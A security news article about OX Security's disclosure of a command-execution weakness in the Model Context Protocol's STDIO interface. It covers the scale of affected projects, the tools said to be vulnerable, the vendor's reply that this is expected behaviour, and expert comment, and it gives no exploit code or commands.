OX Security published research on April 15 disclosing what it calls a “critical, systemic” vulnerability in Anthropic’s Model Context Protocol, the open standard that connects AI agents to external tools and data sources. The flaw enables arbitrary command execution on any system running a vulnerable MCP implementation, potentially exposing sensitive data, API keys, internal databases, and chat histories to attackers.
The vulnerability is not a coding error. It is baked into Anthropic’s official MCP SDKs across Python, TypeScript, Java, and Rust, according to Infosecurity Magazine. Any developer building on the Anthropic MCP foundation inherits the exposure. OX Security estimates over 200 open-source projects, 150 million+ cumulative downloads, 7,000+ publicly accessible servers, and up to 200,000 vulnerable instances are affected.
The Exploit Mechanism
MCP’s STDIO interface was designed to launch a local server process. But the command executes regardless of whether the process starts successfully. “Pass in a malicious command, receive an error, and the command still runs,” OX Security explained in its advisory. No sanitization warnings. No red flags in the developer toolchain. The result: complete system takeover.
The Register reported that the research, which began in November 2025, identified four distinct attack vectors ranging from unauthenticated command injection to hardening bypass techniques that circumvent developer-implemented protections. OX Security successfully compromised 9 of 11 MCP marketplaces during testing. Vulnerable tools include Cursor, VS Code, Claude Code, Windsurf (CVE-2026-30615, zero-click exploitation), and Gemini-CLI. The team has issued over 30 responsible disclosures and discovered more than 10 high- or critical-severity CVEs across individual open-source implementations.
Anthropic’s Response
Anthropic declined to modify the protocol’s architecture. The company told OX Security that the STDIO execution model represents “expected behavior” and that input sanitization is the developer’s responsibility, according to both Infosecurity Magazine and The Register. A week after OX Security’s initial report, Anthropic quietly updated its security policy to note that STDIO adapters “should be used with caution.” OX Security’s assessment: “This change didn’t fix anything.” Anthropic did not respond to The Register’s inquiries for the story.
Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University, told Infosecurity Magazine the research exposed “a shocking gap in the security of foundational AI infrastructure.” He added: “If the very protocol meant to connect AI agents is this fragile and its creators will not fix it, then every company and developer building on top of it needs to treat this as an immediate wake-up call.”
The Supply Chain Risk
The core problem is architectural propagation. Because the flaw lives in the official SDKs, every downstream project that uses Anthropic’s MCP code inherits the vulnerability without knowing it. OX Security’s position is that pushing responsibility to developers for securing infrastructure the protocol itself fails to protect is dangerous given the community’s track record on security. A root patch in the SDK, according to OX Security, could have reduced risk across software packages totaling 150 million downloads and protected millions of downstream users. Instead, individual projects must now patch independently, one at a time.